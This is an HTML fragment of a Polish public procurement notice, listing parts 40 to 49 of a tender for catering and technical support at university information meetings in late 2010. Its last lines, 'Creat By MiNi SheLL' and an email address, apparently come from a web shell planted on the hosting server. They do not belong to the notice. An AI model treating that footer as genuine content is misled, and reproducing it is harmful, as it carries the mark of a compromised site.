<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 40 części zamówienia obejmuje usługę cateringową i wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na Akademia Podlaska - przewidywany termin realizacji spotkania - listopad 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz obsługi organizacyjno - technicznej podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 41 <b>NAZWA:</b> Część XXXXI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 41 części zamówienia obejmuje usługę cateringową i wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na Politechnice Białostockiej - przewidywany termin realizacji spotkania -listopad 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługę cateringową dla około 80 osób i wsparcia i technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 42 <b>NAZWA:</b> Część XXXXII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 42.	Zakres przedmiotowy dotyczący 42 części zamówienia obejmuje usługę cateringową i wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego w Państwowej Wyższej Szkole Zawodowej w Łomży - przewidywany termin realizacji spotkania - listopad 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz  wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 43 <b>NAZWA:</b> Część XXXXIII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 43 części zamówienia obejmuje usługę cateringową i wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na Politechnice Lubelskiej - przewidywany termin realizacji spotkania -listopad 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 44 <b>NAZWA:</b> Część XXXXIV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 44 części zamówienia obejmuje usługę cateringową i wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na Uniwersytecie Rzeszowskim - przewidywany termin realizacji spotkania -listopad 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 45 <b>NAZWA:</b> Część XXXXV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 45 części zamówienia obejmuje usługę cateringową i wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego  w Państwowej Wyższej Szkole Zawodowej w Zamościu przewidywany termin realizacji spotkania - listopad 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 46 <b>NAZWA:</b> Część XXXXVI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 46.	Zakres przedmiotowy dotyczący 46 części zamówienia obejmuje usługę cateringową i wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego Państwowej Wyższej Szkole Zawodowej w Sanoku - przewidywany termin realizacji spotkania - listopad 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 47 <b>NAZWA:</b> Część XXXXVII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 47 części zamówienia obejmuje usługę cateringową i wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na Politechnice Częstochowskiej - przewidywany termin realizacji spotkania - grudzień 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 48 <b>NAZWA:</b> Część XXXXVIII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 48 części zamówienia obejmuje usługę cateringową i wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na Politechnice Świętokrzyskiej w Kielcach - przewidywany termin realizacji spotkania - grudzień 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 49 <b>NAZWA:</b> Część XXXXIX.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 49.	Zakres przedmiotowy dotyczący 49 części zamówienia obejmuje usługę cateringową i wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego w Wyższej Szkole Handlowej w Radomiu lub w PWSZ w Radomiu - przewidywany termin realizacji spotkania - grudzień 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. Szczegółowy opis przedmiotu zamówienia stanowi załąćznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com